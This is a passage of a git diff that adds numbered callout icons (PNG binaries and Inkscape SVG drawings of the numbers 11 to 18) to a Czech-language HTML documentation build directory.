-0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/11.png b/tmp/cs-CZ/html/Common_Content/images/11.png
new file mode 100644
index 000000000..32b4a0483
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/11.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/11.svg b/tmp/cs-CZ/html/Common_Content/images/11.svg
new file mode 100644
index 000000000..c95afcc14
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/11.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/12.png b/tmp/cs-CZ/html/Common_Content/images/12.png
new file mode 100644
index 000000000..45fa4892a
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/12.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/12.svg b/tmp/cs-CZ/html/Common_Content/images/12.svg
new file mode 100644
index 000000000..e3c3fd66c
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/12.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/13.png b/tmp/cs-CZ/html/Common_Content/images/13.png
new file mode 100644
index 000000000..0b766d3f8
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/13.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/13.svg b/tmp/cs-CZ/html/Common_Content/images/13.svg
new file mode 100644
index 000000000..35b496914
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/13.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/14.png b/tmp/cs-CZ/html/Common_Content/images/14.png
new file mode 100644
index 000000000..2e1d73716
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/14.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/14.svg b/tmp/cs-CZ/html/Common_Content/images/14.svg
new file mode 100644
index 000000000..832f81679
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/14.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/15.png b/tmp/cs-CZ/html/Common_Content/images/15.png
new file mode 100644
index 000000000..7d21c66bb
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/15.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/15.svg b/tmp/cs-CZ/html/Common_Content/images/15.svg
new file mode 100644
index 000000000..830d65439
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/15.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2839"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2841"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/16.png b/tmp/cs-CZ/html/Common_Content/images/16.png
new file mode 100644
index 000000000..ff396af2f
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/16.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/16.svg b/tmp/cs-CZ/html/Common_Content/images/16.svg
new file mode 100644
index 000000000..24d1eea04
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/16.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/17.png b/tmp/cs-CZ/html/Common_Content/images/17.png
new file mode 100644
index 000000000..f1ba68a7f
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/17.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/17.svg b/tmp/cs-CZ/html/Common_Content/images/17.svg
new file mode 100644
index 000000000..7796bd1d7
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/17.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/18.png b/tmp/cs-CZ/html/Common_Content/images/18.png
new file mode 100644
index 000000000..df920d025
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/18.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/18.svg b/tmp/cs-CZ/html/Common_Content/images/18.svg
new file mode 100644
index 000000000..356f207ee
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/18.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 